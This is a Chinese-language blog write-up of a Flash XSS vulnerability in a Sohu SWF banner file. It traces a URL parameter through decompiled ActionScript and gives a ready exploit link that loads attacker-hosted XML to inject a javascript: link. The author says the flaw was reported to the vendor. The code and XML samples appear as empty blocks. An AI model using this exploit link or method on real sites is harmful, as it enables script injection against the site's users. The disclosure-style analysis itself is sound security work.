搜狐某处Flash XSS漏洞分析

1.2 反编译得到源码

.1469170903097

1.3 初步分析

  • actionscript分为AS2.0以及AS3.0,这里面用到了getURL();很明显就是AS2.0的代码
  • url链接里面向swf传递了一个bcastr_xml_url参数,这个应该就是AS文件的入口

1.4 定位分析

入口在脚本的571行,代码如下

 

  • 先是实例化了XML类的实例:bcastr_xml
  • 然后利用load()加载xml文件(感觉可以XXE,但是暂时没有测试)
  • 最后将xml的节点放置在了bcastr_link_array以及bcastr_title_array的数组中
  • 接着,我们定位到538getURL()函数,它的作用就是鼠标点击并释放之后就跳转到相应链接。

1.5 利用Javascript伪协议

 

原xml文件内容

 

 

远程服务器自己写的xml

 

 

访问链接(Firefox,chrome浏览器不会绕过)http://ftx.bai.sohu.com/bcastr.swf?bcastr_xml_url=http://192.168.32.40/sohu.xml

.1469174603927

1.5 利用Javascript伪协议

点击图片

.1469174581436

1.6 备注

该文只用于学习交流,已通知官方修复此漏洞

此条目发表在黑盒渗透分类目录,贴了, , 标签。将固定链接加入收藏夹。

发表评论

电子邮件地址不会被公开。 必填项已用*标注